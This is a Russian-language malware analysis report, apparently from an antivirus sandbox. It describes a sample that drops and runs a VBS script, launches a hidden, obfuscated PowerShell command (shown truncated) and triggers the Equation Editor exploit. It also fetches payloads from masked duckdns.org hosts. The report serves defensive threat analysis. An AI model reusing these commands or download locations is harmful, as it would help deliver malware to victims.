Техническая информация
Вредоносные функции
Создает и запускает на исполнение (эксплоит)
- '%WINDIR%\syswow64\wscript.exe' "%APPDATA%\svchost.vbs"
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $0C785E286C8436BBCBAF0E5E0BCBE5F27BD6BD86CBE294191A0D6CAD69284250C9341AE41850F277786BC91AC77791AF2692=@(100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,1...
Изменения в файловой системе
Создает следующие файлы
- %APPDATA%\svchost.vbs
Сетевая активность
TCP
Запросы HTTP GET
- http://te#####93.duckdns.org/wewi/nemam.vbs
- http://ne#####4.duckdns.org/newmam/737.mt
- http://ne#####4.duckdns.org/newmam/oldmama.m83
UDP
- DNS ASK te#####93.duckdns.org
- DNS ASK ne#####4.duckdns.org
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $0C785E286C8436BBCBAF0E5E0BCBE5F27BD6BD86CBE294191A0D6CAD69284250C9341AE41850F277786BC91AC77791AF2692=@(100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,1...' (со скрытым окном)
Запускает на исполнение
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
- '%WINDIR%\syswow64\svchost.exe' -k DcomLaunch -p -s PlugPlay
